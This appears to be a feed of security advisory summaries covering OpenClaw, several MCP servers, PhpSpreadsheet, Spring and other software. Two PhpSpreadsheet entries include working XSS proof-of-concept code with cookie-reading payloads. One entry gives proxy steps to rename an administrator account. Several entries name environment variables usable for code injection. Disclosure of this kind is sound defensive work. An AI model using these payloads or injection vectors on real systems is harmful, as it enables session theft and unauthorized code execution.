OpenClaw before 2026.4.8 treats shared reply MEDIA paths as trusted, allowing crafted references to trigger cross-channel local file exfiltration. Attackers can exploit this by crafting malicious shared reply MEDIA references to cause another channel to read local file paths as trusted generated media.
Improper Verification of Cryptographic Signature (CWE-347) in Elastic Package Registry could allow an attacker positioned to intercept network traffic, or to otherwise influence the contents served to a self-hosted registry, to substitute a tampered package without the integrity check failing closed.
OpenClaw before version 2026.3.31 accepts arbitrary tailnet peers as DNS authorities due to improper validation in its wide-area discovery mechanism, enabling attackers positioned within the same tailnet with CA-trusted endpoint access to manipulate DNS resolution and exfiltrate operator credentials. The vulnerability requires adjacent network access, high attack complexity, and user interaction, but results in high confidentiality impact through credential theft. No active exploitation has been publicly confirmed at the time of analysis.
OpenClaw before 2026.4.8 contains a remote code execution vulnerability caused by missing environment variable denylist entries for HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS. Attackers can inject malicious build tool environment variables to influence host exec commands and achieve arbitrary code execution.
OpenClaw before 2026.4.8 fails to remove git plumbing environment variables from the execution environment before host exec operations. Attackers can exploit this by setting GIT_DIR and related variables to redirect git operations and compromise repository integrity.
OpenClaw before version 2026.3.31 allows local authenticated attackers to redirect Python package-index traffic by injecting malicious URLs through unsanitized PIP_INDEX_URL and UV_INDEX_URL environment variables, enabling interception or manipulation of package management operations. The vulnerability requires local access and authentication but can result in high integrity impact through compromised package delivery. No active exploitation has been publicly confirmed, but the attack surface is direct and the remediation is straightforward.
OpenClaw before 2026.3.31 allows authenticated users with approved host-exec requests to execute arbitrary code during build processes by overriding compiler binary environment variables (CC, CXX, CARGO_BUILD_RUSTC, CMAKE_C_COMPILER) through an incomplete host-env-security-policy.json configuration. The vulnerability requires local access and prior authentication to an OpenClaw instance, but enables full code execution with inherited privileges during compilation. No public exploit code has been identified at time of analysis.
A vulnerability has been found in eiliyaabedini aider-mcp up to 667b914301aada695aab0e46d1fb3a7d5e32c8af. Affected is an unknown function of the file aider_mcp.py of the component code_with_ai. The manipulation of the argument working_dir/editable_files leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.
Command injection in dvladimirov MCP up to version 0.1.0 allows remote unauthenticated attackers to execute arbitrary system commands via manipulation of the repo_url or pattern arguments in the GitSearchRequest function of mcp_server.py. The vulnerability has a publicly available exploit and CVSS 6.9 score indicating moderate severity with network-accessible attack vector and low complexity, though the vendor has not responded to the early disclosure.
A flaw has been found in elinsky execution-system-mcp 0.1.0. The impacted element is the function _get_context_file_path of the file src/execution_system_mcp/server.py of the component add_action Tool. This manipulation of the argument context causes path traversal. The attack can be initiated remotely. The exploit has been published and may be used.
A flaw has been found in eiceblue spire-pdf-mcp-server 0.1.1. This impacts the function get_pdf_path of the file src/spire_pdf_mcp/server.py of the component PDF File Handler. Executing a manipulation of the argument filepath can lead to path traversal. The attack can be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.
A vulnerability was detected in eiceblue spire-doc-mcp-server 1.0.0. This affects the function get_doc_path of the file src/spire_doc_mcp/api/base.py. Performing a manipulation of the argument document_name results in path traversal. The attack can be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Path traversal in duartium papers-mcp-server allows remote unauthenticated attackers to access arbitrary files on the server by manipulating the topic argument in the search_papers function. The vulnerability affects commit 9ceb3812a6458ba7922ca24a7406f8807bc55598 and is publicly exploitable with proof-of-concept code available; the vendor has been notified via issue report but has not yet responded.
SQL injection in dubydu sqlite-mcp up to version 0.1.0 allows remote attackers to manipulate the output_filename parameter in the extract_to_json function, enabling arbitrary SQL command execution. The vulnerability has publicly available exploit code and affects all default installations without authentication requirements.
XML External Entity (XXE) injection in GRASSMARLIN v3.2.1 allows authenticated local users to extract sensitive information through crafted session data that exploits insufficient XML parser hardening. The vulnerability has a CVSS score of 5.5 with local attack vector and high confidentiality impact, affecting users with login credentials on systems running the affected version.
Path traversal in DV0x creative-ad-agent server component (up to commit 751b9e5146604dc65049bd0f62dcbdad6212f8a3) allows remote unauthenticated attackers to read arbitrary files via manipulation of req.params arguments in server/sdk-server.ts. Public exploit code is available. CVSS 5.5 reflects low confidentiality impact with network-accessible attack vector and no authentication requirement.
It was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes. ## The Problem In `Writer/Html.php` around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply `htmlspecialchars()`: ```php if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, ...); } ``` When a cell has a custom number format containing `@` (text placeholder) with any additional literal characters, the formatter replaces `@` with the cell value and adds the extra characters. This makes `$cellData !== $origData`, so `htmlspecialchars()` is **skipped entirely**. Even a single trailing space in the format (`@ `) is enough to bypass the escape. ## Proof of Concept ```php use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; use PhpOffice\PhpSpreadsheet\Cell\DataType; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // XSS payload with malicious number format $sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @'); $writer = new Html($spreadsheet); $writer->save('output.html'); ``` The generated HTML contains: ```html <td>. <img src=x onerror=alert(document.cookie)></td> ``` The XSS payload is **completely unescaped**. ## Tested Bypass Formats | Format Code | Result | Escaped? | |---|---|---| | `General` (default) | Original value | YES (safe) | | `. @` | `. ` + value | **NO (XSS!)** | | `@ ` (trailing space) | value + ` ` | **NO (XSS!)** | | `x@` | `x` + value | **NO (XSS!)** | This was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser. ## Impact Any application that: 1. Accepts uploaded XLSX files from users 2. Converts them to HTML using PhpSpreadsheet's HTML writer 3. Displays the HTML to other users ...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's `xl/styles.xml`. ## Suggested Fix Always apply `htmlspecialchars()` regardless of whether formatting changed the value: ```php // Instead of conditional escaping: $cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ``` Or escape AFTER formatting, not conditionally based on equality. ## Reporter Keyvan Hardani
OpenClaw before version 2026.3.31 allows local authenticated users with user interaction to bypass exec allowlist restrictions via shell initialization file options (--rcfile, --init-file, --startup-file), enabling them to load attacker-controlled initialization files and achieve high-impact unauthorized access to confined resources. Exploitation requires local access, low privileges, user interaction, and specific timing conditions, but bypasses a critical security control intended to restrict executable trust.
Cross-Site Scripting (XSS) via malicious SVG upload in FUEL CMS v1.5.2 and earlier allows low-privileged authenticated users to execute arbitrary JavaScript in the context of other users' browsers through the asset upload functionality. The vulnerability stems from inadequate sanitization of SVG file contents during upload, enabling attackers with valid credentials to craft weaponized SVG files that execute when viewed by administrators or other site visitors. No active exploitation in CISA KEV confirmed; CVSS 5.4 reflects moderate impact with user interaction requirement.
Penetration Testing engineers at Amazon have discovered a flaw where the camera system fails to properly handle data supplied in certain requests, causing a service disruption. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, low attack complexity.
Booking Package plugin for WordPress up to version 1.7.06 allows unauthenticated attackers to manipulate booking prices via the intentForStripe() function, which accepts unsanitized $_POST['amount'] values and passes them directly to the Stripe PaymentIntent API without validation. The vulnerability is compounded by commented-out code in CreditCard.php that would normally enforce server-calculated pricing, enabling attackers to complete bookings at arbitrary prices (e.g., $0.01 instead of $500.00) with no authentication required. This is a confirmed price manipulation vulnerability with no active KEV exploitation reported but represents significant financial fraud risk.
OpenTelemetry's Zipkin exporter for .NET allows unauthenticated remote attackers to trigger denial of service by sending spans with high-cardinality remote endpoint attributes, causing unbounded memory growth in the remote endpoint cache and eventual process degradation. CVSS 5.3 (network-accessible, low complexity). Patch available from vendor; no active exploitation identified.
OpenClaw before 2026.4.8 contains improper input validation in base64 decode paths that allocate memory before enforcing decoded-size limits. Attackers can exploit multiple code paths to cause memory exhaustion or denial of service through crafted base64-encoded input.
Insecure deserialization in Cista v0.15 and below allows remote unauthenticated attackers to leak stack and heap addresses through reference tampering in the cista::raw namespace, potentially defeating ASLR protections. The vulnerability arises from insufficient validation of pointer-like objects during deserialization, enabling attackers to observe deserialized values and extract memory layout information for subsequent exploitation.
OpenClaw versions 2026.2.14 through 2026.3.24 fail to enforce guild and channel policy gates on Discord button and component interactions, allowing authenticated users to trigger privileged component actions from contexts where those actions should be blocked. The vulnerability bypasses channel policy enforcement via policy gate inconsistency, enabling privilege escalation within Discord servers where OpenClaw is deployed.
OpenClaw before version 2026.3.31 allows authenticated remote attackers to bypass sender allowlist filters when retrieving MS Teams thread history via Microsoft Graph API, enabling access to messages that should be restricted by security policies. The vulnerability affects organizations using OpenClaw's Teams integration and has been patched as of the specified version.
Stack overflow in Apache Thrift c_glib dispatch mechanism allows remote attackers to trigger denial of service via crafted network requests. The vulnerability affects Apache Thrift versions prior to 0.23.0 and requires no authentication or user interaction, resulting in application crashes or service unavailability. Patch is available from the vendor.
### Summary The application fails to validate the ```nick``` parameter during a ```POST``` request to the ```EditUser``` controller. Although the UI prevents editing this field, a user can bypass this restriction using a proxy to rename any account (including the Administrator). This leads to Broken Access Control and potential Audit Log Corruption. ### Details The vulnerability exists in the user update logic. When a ```POST``` request is sent to ```/EditUser```, the backend processes the ```nick``` form-data parameter without checking if it matches the original value or if the user has the privilege to change a unique identifier that is intended to be immutable. ### PoC ***1.*** Log in to the dashboard as any user (e.g. admin user). ***2.*** Go to your Profile by clicking your username/avatar in the top right. ***3.*** Open Burp Suite and ensure Intercept is ON. ***5.*** Click the Save button in the UI. ***6.*** In Burp Suite, locate ```nick``` in the body: <img width="1915" height="1013" alt="Screenshot_2026-03-04_05_26_32" src="https://github.com/user-attachments/assets/aea4e6fd-beba-4a47-96da-8b9bd9075681" /> ***7.*** Change the value admin to Vulnerable (or any other string). ***8.*** Click Forward in Burp Suite. The application will log the user out. It is possible to now log back in using the username "Vulnerable" and the original password. ### Impact An attacker can effectively sabotage the system’s audit trail, performing malicious actions and then renaming their account to evade detection or frame other users. This breakdown in accountability facilitates identity impersonation and risks data corruption, as internal references to the original username become orphaned, undermining the overall integrity of the multi-user environment. ### Result #### Before <img width="1920" height="996" alt="Screenshot_2026-03-04_05_25_30" src="https://github.com/user-attachments/assets/3b2d34e5-a2b9-4da9-9a56-963fe1a8fd65" /> #### After <img width="1920" height="955" alt="Screenshot_2026-03-04_05_27_00" src="https://github.com/user-attachments/assets/af1de0ef-2b55-4d29-9557-29ee26a3775a" />
OpenClaw before version 2026.3.31 fails to block plugin installation when security scans detect threats, allowing authenticated users to install malicious plugins by ignoring visible scan warnings. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), but enables installation of untrusted code with moderate integrity impact when exploited.
OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist policies.
Spring Boot's Cassandra auto-configuration fails to verify hostnames during SSL/TLS connection establishment to Cassandra servers, enabling man-in-the-middle attackers on the local network to intercept credentials and data by presenting a valid certificate for any domain. Affects Spring Boot 2.7.0-4.0.5; vendor-released patches available for all supported versions (4.0.6, 3.5.14, 3.4.16, 3.3.19, 2.7.33). No public exploit code identified at time of analysis.
A vulnerability affecting the detailed versions of Cryptobox allows a legitimate user to prevent another to login by triggering an account lockout via sending a specially crafted request.
OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in Playwright redirect handling that allows attackers to bypass strict SSRF checks. Attackers can exploit request-time navigation to reach private targets that should be restricted by browser SSRF protections.
OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access restricted resources.
Remote code execution in DeskTime Time Tracking App before version 1.3.674 via improper TLS certificate validation allows network-positioned attackers to serve malicious executables during application updates without requiring user interaction. The vulnerability exploits the update mechanism's failure to properly validate TLS certificates, enabling an attacker in a man-in-the-middle position to achieve user-level code execution. EPSS score of 0.02% suggests low real-world exploitation probability despite RCE severity, likely due to the requirement for network positioning and the attack's reliance on coinciding update requests.
### Summary The HTML Writer in PhpSpreadsheet bypasses `htmlspecialchars()` output escaping when a cell uses a custom number format containing the `@` text placeholder with additional literal text (e.g., `@ "items"` or `"Total: "@`). This allows an attacker to inject arbitrary HTML and JavaScript into the generated HTML output by crafting a malicious XLSX file. ### Details #### 1. Conditional escaping in `Html.php:1586-1594` ```php $cellData = NumberFormat::toFormattedString( $origData2, $formatCode ?? NumberFormat::FORMAT_GENERAL, [$this, 'formatColor'] ); if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, Settings::htmlEntityFlags()); } ``` `htmlspecialchars()` is only called when `$cellData === $origData` (strict comparison). If the formatted output differs from the original value in any way, escaping is skipped entirely. #### 2. Early return in `Formatter.php:136-152` ```php if (preg_match(self::SECTION_SPLIT, $format) === 0 && preg_match(self::SYMBOL_AT, $formatx) === 1) { if (!str_contains($format, '"')) { return str_replace('@', /* raw value */, $format); } return str_replace(/* ... preg_replace with raw value ... */); } ``` When the format code contains `@` with additional literal text (e.g., `@ "items"`), the formatter substitutes the raw cell value into the format string and **returns early** - the `formatColor` callback (which would have applied `htmlspecialchars`) is never invoked. ### PoC **test.php** ``` php <?php require '/app/vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); $payload = '<img src=x onerror=alert(document.domain)>'; $formatCode = '@ "items"'; $sheet->setCellValue('A1', $payload); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode($formatCode); $writer = new Html($spreadsheet); $html = $writer->generateHTMLAll(); file_put_contents('/app/output.html', $html); echo "HTML output saved to /app/output.html\n"; ``` The produced output contains unescaped data. ``` html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="PhpSpreadsheet, https://github.com/PHPOffice/PhpSpreadsheet" /> <title>Untitled Spreadsheet</title> <meta name="author" content="Unknown Creator" /> <meta name="title" content="Untitled Spreadsheet" /> <meta name="lastModifiedBy" content="Unknown Creator" /> <meta name="created" content="2026-04-02T16:34:44+00:00" /> <meta name="modified" content="2026-04-02T16:34:44+00:00" /> <style type="text/css"> [..SNIP..] </style> </head> <body> <div style='page: page0'> <table border='0' cellpadding='0' cellspacing='0' id='sheet0' class='sheet0 gridlines'> <col class="col0" /> <tbody> <tr class="row0"> <td class="column0 style1 s"><img src=x onerror=alert(document.domain)> items</td> </tr> </tbody></table> </div> </body> </html> ``` <img width="719" height="716" alt="Screenshot 2026-04-02 at 18 45 53" src="https://github.com/user-attachments/assets/b758b063-a2d1-4e76-87bb-931eae81dbfe" /> ### Impact The impact changes based on the way the HTML is served. In case it is served from the web server it is typical XSS, in case the file is downloaded and opened locally, the attack vector is more limited.
Spring Boot applications configured with ApplicationPidFileWriter are vulnerable to local file corruption when a high-privilege user can write to the PID file directory. An attacker with high privileges and write access to the PID file location can corrupt arbitrary files each time the application restarts, achieving denial of service or data integrity violations. Exploitation requires local access and elevated privileges, limiting real-world impact to co-resident or insider threat scenarios. No active exploitation has been publicly reported.
Remote command execution in mpGabinet 23.12.19 and below allows authenticated database administrators or unauthenticated attackers (via chained exploitation of CVE-2026-40550 and CVE-2026-40551) to achieve system command execution by manipulating attachment storage paths in the database to reference attacker-controlled resources that execute when users open the files. The vulnerability requires direct database access and user interaction to trigger execution, but becomes unauthenticated when chained with companion CVE vulnerabilities that grant database and application access.
OpenShift Container Platform build system allows authenticated users with the edit ClusterRole to inject arbitrary environment variables into docker-build containers via the buildconfigs/instantiate API, enabling information disclosure attacks such as build traffic interception through LD_PRELOAD or http_proxy manipulation. This represents an incomplete remediation of a prior vulnerability, affecting confidentiality of sensitive build data with CVSS 4.3 (network-accessible, low complexity, authenticated). No public exploit code or active exploitation has been confirmed at the time of analysis.
Integer overflow in ANGLE in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)
Spring gRPC 1.0.0 through 1.0.2 inherits authenticated user identity on gRPC worker threads after access denial, allowing a subsequent unauthenticated request on the same thread to gain escalated permissions. The vulnerability requires an authenticated attacker with prior knowledge of thread reuse patterns and affects only configurations where both authenticated and unauthenticated requests share gRPC worker threads. A patch is available in version 1.0.3.